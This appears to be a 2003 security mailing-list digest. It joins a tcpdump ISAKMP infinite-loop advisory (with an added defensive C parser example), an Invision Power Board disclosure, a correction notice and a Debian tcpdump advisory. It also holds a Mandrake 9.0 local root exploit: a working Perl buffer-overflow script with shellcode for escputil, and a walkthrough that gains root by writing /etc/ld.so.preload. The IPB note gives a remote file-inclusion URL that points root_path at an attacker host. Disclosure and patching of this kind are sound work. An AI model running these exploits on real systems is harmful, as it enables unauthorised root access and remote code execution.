cookie 773b4e8a1618caa8->51efacc0a65e0334: phase 2/others ? #69[C]:
(#83)
(#237)
(#237)
(#237)
(#237)
(#237)
(#237)
(#237)
(#237)
... 

The string "(#237)" will continue to print indefinitely; at this point
TCPDUMP is no longer processing other packets. The vulnerable segment of
code has been narrowed down to the following loop from
print-isakmp.c:isakmp_sub_print(); the while() loop is never exited because
the variable 'np' never becomes zero: 

while (np) {
        safememcpy(&e, ext, sizeof(e));

        if (ep < (u_char *)ext + ntohs(e.len)) {
                printf(" [|%s]", NPSTR(np));
                cp = ep + 1;
                break;
        }
        depth++;
        printf("\n");
        for (i = 0; i < depth; i++)
                printf("    ");
        printf("(");
        cp = isakmp_sub0_print(np, ext, ep, phase, doi, proto);
        printf(")");
        depth--;

        np = e.np;
        ext = (struct isakmp_gen *)cp;
}

III. ANALYSIS

Any remote user can generate a specially crafted packet that will cause
TCPDUMP to enter an infinite loop, thereby rendering the application
useless and preventing the administrator from viewing network traffic.
Attackers can anonymously trigger this vulnerability by spoofing the
source address of the malicious packet; this is possible because it
traverses the User Datagram Protocol (UDP), a stateless protocol.
While the vulnerability exists specifically in the TCPDUMP code base, there
are some applications that utilize code from TCPDUMP or "wrap" around
TCPDUMP, and such applications would also be affected. 

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in TCPDUMP
versions 3.6, 3.6.3, 3.7.1 built against LIBPCAP versions .6 and .7 on
both the Linux and FreeBSD platforms.  Many other Linux distributions
contain vulnerable TCPDUMP versions.

V. RECOVERY

An affected application is rendered useless upon entry into the infinite
loop. The application must be restarted to regain normal functionality. 

VI. WORKAROUND

An ad hoc workaround that can be implemented until an official vendor
patch has been made available is to simply filter out parsing of packets
destined to TCP or UDP port 500. This will prevent a malformed packet from
affecting a vulnerable version of TCPDUMP. The addition of the following
boolean string can be used to accomplish this task: 

[and] dst port not 500 

Where the [and] is optional depending on whether or not additional boolean
expressions are provided.

VII. VENDOR FIX/RESPONSE

This vulnerability was already closed by Guy Harris during routine
development; users of the CVS version downloaded since September 6, 2002
(revision 1.34 of print-isakmp.c) are not vulnerable.  The new 3.7.2
tcpdump release includes this and a couple of additional security
fixes; the 0.7.2 libpcap release includes new functionality but no
security fixes.

The following packages are available:

http://www.tcpdump.org/release/tcpdump-3.7.2.tar.gz
http://www.tcpdump.org/release/libpcap-0.7.2.tar.gz


Debian 2.2 (potato) contains tcpdump 3.4a6, which does not appear to be
vulnerable (version 3.4a6 does not include an isakmp dissector). Debian
3.0 (woody) contains tcpdump 3.6.2, which is vulnerable.  Updated packages
are available from http://www.debian.org/security/ .


VIII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has
assigned the identification number CAN-2003-0108 to this issue.

IX. DISCLOSURE TIMELINE

12/09/2002  Issue disclosed to iDEFENSE
02/25/2003  TCPDUMP maintainers notified: [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED] and 
[EMAIL PROTECTED]
02/25/2003  Responses from Guy Harris, Bill Fenner, Michael Richardson
02/25/2003  iDEFENSE clients notified
02/26/2003  OS vendors notified via [EMAIL PROTECTED]
02/27/2003  Public Disclosure

X. CREDIT

Andrew Griffiths ([EMAIL PROTECTED]) is credited with discovering this
vulnerability.


Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "su
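The loop quoted in section II stops only when 'np' reaches zero, and it
reaches the next header only by advancing past the current payload. The
example below is an added illustration, not tcpdump's code nor part of the
iDEFENSE advisory, of how a dissector can walk a chain of ISAKMP generic
payload headers so that it cannot spin on malformed input: each header
must fit in the remaining packet, the length field must be at least the
4-byte header size so that the cursor always moves forward, the body must
lie inside the packet, and the number of payloads is capped. It assumes
the ISAKMP generic header layout from RFC 2408 (next payload, reserved,
length in network byte order); the function names, the cap value and the
byte strings it is fed are constructed for this example. DSA 255-1 further
down the page addresses the same CAN-2003-0108 issue.

```c
/*
 * Added example, not tcpdump or iDEFENSE code: a bounded walk over a
 * chain of ISAKMP generic payload headers (RFC 2408, section 3.2):
 *
 *   next payload (1 byte) | reserved (1 byte) | payload length (2 bytes, BE)
 *
 * A loop that advances by the length field and stops only when the next
 * payload type is 0 never terminates if a length field is smaller than
 * the header itself (assumed failure mode). This walker rejects that case.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define ISAKMP_GEN_LEN      ((size_t)4)   /* size of the generic payload header */
#define ISAKMP_MAX_PAYLOADS 64            /* constructed cap for this example */

enum walk_result {
    WALK_OK           =  0,  /* chain ended with next payload == 0 */
    WALK_ERR_SHORT    = -1,  /* header or body runs past the packet */
    WALK_ERR_ZERO_LEN = -2,  /* length < 4: cursor could never advance */
    WALK_ERR_TOO_MANY = -3   /* more payloads than ISAKMP_MAX_PAYLOADS */
};

/*
 * Walk the payload chain that starts at buf[0]; first_np is the type of
 * that first payload (taken from the fixed ISAKMP header's next-payload
 * field). Returns the number of payloads visited (>= 0), or a negative
 * walk_result on malformed input. Never loops without making progress.
 */
int isakmp_walk_payloads(uint8_t first_np, const uint8_t *buf, size_t len)
{
    size_t off = 0;
    int count = 0;
    uint8_t np = first_np;

    while (np != 0) {
        if (count >= ISAKMP_MAX_PAYLOADS)
            return WALK_ERR_TOO_MANY;
        if (len - off < ISAKMP_GEN_LEN)      /* header must fit */
            return WALK_ERR_SHORT;

        uint16_t plen = (uint16_t)((buf[off + 2] << 8) | buf[off + 3]);

        /* A payload shorter than its own header cannot move the cursor;
         * an unguarded loop would re-read this header forever. */
        if (plen < ISAKMP_GEN_LEN)
            return WALK_ERR_ZERO_LEN;
        if (plen > len - off)                /* body must fit */
            return WALK_ERR_SHORT;

        np = buf[off];   /* type of the following payload */
        off += plen;     /* guaranteed progress: plen >= 4 */
        count++;
    }
    return count;
}

/* Constructed sample: SA payload (type 1) followed by a Nonce (type 10). */
int demo_well_formed(void)
{
    static const uint8_t pkt[] = {
        10, 0, 0, 8, 0xde, 0xad, 0xbe, 0xef,  /* next = 10, len 8 */
        0,  0, 0, 6, 0x01, 0x02               /* next = 0 (end), len 6 */
    };
    return isakmp_walk_payloads(1, pkt, sizeof pkt);   /* 2 */
}

/* Constructed sample: unknown type 237 with a zero length field. */
int demo_zero_length(void)
{
    static const uint8_t pkt[] = { 237, 0, 0, 0 };
    return isakmp_walk_payloads(237, pkt, sizeof pkt); /* WALK_ERR_ZERO_LEN */
}

/* Constructed sample: length field claims 20 bytes, packet has 8. */
int demo_truncated(void)
{
    static const uint8_t pkt[] = { 0, 0, 0, 20, 1, 2, 3, 4 };
    return isakmp_walk_payloads(1, pkt, sizeof pkt);   /* WALK_ERR_SHORT */
}

int main(void)
{
    printf("well-formed: %d payloads\n", demo_well_formed());
    printf("zero-length: %d\n", demo_zero_length());
    printf("truncated:   %d\n", demo_truncated());
    return 0;
}
```

The two checks that matter for termination are the minimum-length test
(every iteration moves 'off' forward by at least the header size) and the
payload cap; the bounds tests additionally keep the walker from reading
past the captured packet, which is a separate class of dissector bug.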

Invision Power Board (PHP)

2003-02-27 Thread Frog Man


Information :
°°
Website : http://www.invisionboard.com
--
Version : 1.0.1
Problem : phpinfo()
--
Version : 1.1.1
Problem : File Including
PHP Code/Location :
°°°
v1.0.1 :
phpinfo.php :
--

--
v1.1.1 :
ipchat.php :
-
require $root_path."conf_global.php";
-
(this is a hole if register_globals=ON)
Exploits :
°°
v1.0.1 :
http://[target]/phpinfo.php
v1.1.1 :
http://[target]/ipchat.php?root_path=http://[attacker]/
with :
http://[attacker]/conf_global.php
Patches :

Patches for both versions have been published on http://www.phpsecure.org .
More Details :
°°
In French :
http://www.frog-man.org/tutos/InvisionPowerBoard.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
[EMAIL PROTECTED]






Re: MS-Windows ME IE/Outlook/HelpCenter critical vulnerability

2003-02-27 Thread Fozzy
Hi,

My post entitled "MS-Windows ME IE/Outlook/HelpCenter critical vulnerability" was 
parsed incorrectly by the securityfocus mailing-list manager, giving me a From: address 
"[EMAIL PROTECTED]".

My contact e-mail is [EMAIL PROTECTED] I am not, in any way, a member of 
securityfocus.com.

Thanks,

Fozzy

The Hackademy Audit, Journal & School - Paris
http://www.thehackademy.net

PS: with respect to the reported security issue, please take good note that this is a 
WinME issue. Windows XP is vulnerable _only_ if patch MS02-060 was not applied. So 
most WinXP users are safe. Moreover, a Microsoft guy told me the Help Center is not 
included in Windows 2000, so Win2000 should not be vulnerable.


Mandrake 9.0 local root exploit

2003-02-27 Thread Priv8 Security


--
 Priv8 Security - www.priv8security.com
 
 priv8mdk90.tar.gz - Mandrake 9.0 local root exploit

 Based on Idefense adv.
http://www.idefense.com/advisory/01.21.03.txt
 
 Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.

OBS. My english sux...
--

 Ok, our goal is to get root by exploiting ml85p, which is
suid root by default on mdk 9.0

[EMAIL PROTECTED] priv8]$ ls -l /usr/bin/ml85p
-rwsr-x---  1 root sys  12344 Set 17 16:40 /usr/bin/ml85p*

 You can see that we're gonna need group sys to run it, so
first let's get it. 
 
[EMAIL PROTECTED] priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x  1 lp   sys 132600 Set 17 16:40 /usr/bin/mtink*
[EMAIL PROTECTED] priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x  1 lp   sys  32088 Set 17 16:40 /usr/bin/escputil*

 We have two here that are vuln: mtink has a stack
overflow on env HOME, and escputil
has a stack overflow too on a command line arg; for more
details read the idefense adv.

So here we go.
First we get gid sys by exploiting mtink or escputil; you
can choose which one you want to.

[EMAIL PROTECTED] priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[EMAIL PROTECTED] priv8]$ perl priv8mtink.pl
 Priv8security.com Mandrake 9 mtink local sys exploit!!
 usage: priv8mtink.pl offset
 Using address: 0xba80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)

And now we can exploit ml85p

1 - Writing any file on system!!!

sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: 
sh-2.05b$

Now we check if it worked

[EMAIL PROTECTED] root]# pwd
/root
[EMAIL PROTECTED] root]# ls -l hi*
-rw-rw-rw-  1 root sys 0 Fev 24 03:32 hi-there-Mr-root

2 - Getting root with it ;)

I will do the same thing as in the idefense adv, so let's do it..

sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: 
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw-  1 root sys 0 Feb 26 00:12 /etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[EMAIL PROTECTED] root]# id
uid=0(root) gid=0(root) grupos=0(root)

It worked, so take care what you'll write ok ;)
that's it.

--
priv8escputil.pl
--

#!/usr/bin/perl
##
#Priv8security.com escputil local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on http://www.idefense.com/advisory/01.21.03.txt
#
#

$shellcode =
    "\x31\xc0\xb0".                      #setregid(x,x) - where x = x03 sys gid
    "\x03".                              # x = x03 sys gid
    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".  #end setregid()
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
    "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

$size = 1050;
$retaddr = 0xb4e0;
$nop = "\x90";
$offset = 0;

if (@ARGV == 1) {
    $offset = $ARGV[0];
}

print " Priv8security.com Mandrake 9 escputil local sys exploit!!\n";
print " usage: $0 offset\n";

for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print " Using address: 0x", sprintf('%lx', ($retaddr + $offset)), "\n";

$newret = pack('l', ($retaddr + $offset));

for ($i += length($shellcode); $i < $size; $i += 4) {
    $buffer .= $newret;
}

exec("/usr/bin/escputil -c -P $buffer");


--
priv8ml85p.pl
---

[SECURITY] [DSA 255-1] New tcpdump packages fix denial of service vulnerability

2003-02-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 255-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 27th, 2003 http://www.debian.org/security/faq
- --

Package: tcpdump
Vulnerability  : infinite loop
Problem-Type   : remote
Debian-specific: no
CVE Id : CAN-2003-0108

Andrew Griffiths and iDEFENSE Labs discovered a problem in tcpdump, a
powerful tool for network monitoring and data acquisition.  An
attacker is able to send a specially crafted network packet which
causes tcpdump to enter an infinite loop.

In addition to the above problem the tcpdump developers discovered a
potential infinite loop when parsing malformed BGP packets.  They also
discovered a buffer overflow that can be exploited with certain
malformed NFS packets.

For the stable distribution (woody) these problems have been
fixed in version 3.6.2-2.3.

The old stable distribution (potato) does not seem to be affected
by this problem.

For the unstable distribution (sid) these problems have been fixed in
version 3.7.1-1.2.

We recommend that you upgrade your tcpdump packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3.dsc
  Size/MD5 checksum:  587 7316fea776a03291973de9db5dda34a1
http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3.diff.gz
  Size/MD5 checksum:10413 467813aab9a57869160e3082c7a11679
http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2.orig.tar.gz
  Size/MD5 checksum:   380635 6bc8da35f9eed4e675bfdf04ce312248

  Alpha architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_alpha.deb
  Size/MD5 checksum:   213570 17577dd6cbe33e486dd8b193a3f188b0

  ARM architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_arm.deb
  Size/MD5 checksum:   179598 005967e88f0895d8f962f07f3db525f7

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_i386.deb
  Size/MD5 checksum:   169482 2e6aadf125c8e7bbde3d0dd162201480

  Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_ia64.deb
  Size/MD5 checksum:   246744 c42598c647c1380689a7e196a7f685bb

  HP Precision architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_hppa.deb
  Size/MD5 checksum:   192974 6d2133766c5e3d2dd5d8121a55d57bed

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_m68k.deb
  Size/MD5 checksum:   157444 b20c63dca863d7e752eac1ac8089b469

  Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_mips.deb
  Size/MD5 checksum:   188792 07f375adc0a86d704ce12e6f50036fa8

  Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_mipsel.deb
  Size/MD5 checksum:   193058 46aa1ad7a702c9214e028c7f1f7bf877

  PowerPC architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_powerpc.deb
  Size/MD5 checksum:   176780 074f39b9dcc3d4d47f73c8e2052ff91c

  IBM S/390 architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_s390.deb
  Size/MD5 checksum:   174304 72e42bf4582d67d69b2f6bc84961f7db

  Sun Sparc architecture:

http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.3_sparc.deb
  Size/MD5 checksum:   179182 e1ebe0dec3667c68f8213827e66826fe


  These files will probably be moved into the stable distribution on
  its next revision.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+XnZ6W5ql+IAeqTIRAmFFAJ9/XqbMsibLWcHpzwULzXtLrrv/YACgsiZM
Z8FnivzplvG1QcNhYnlljVk=
=cFNB
-END PGP SIGNATURE-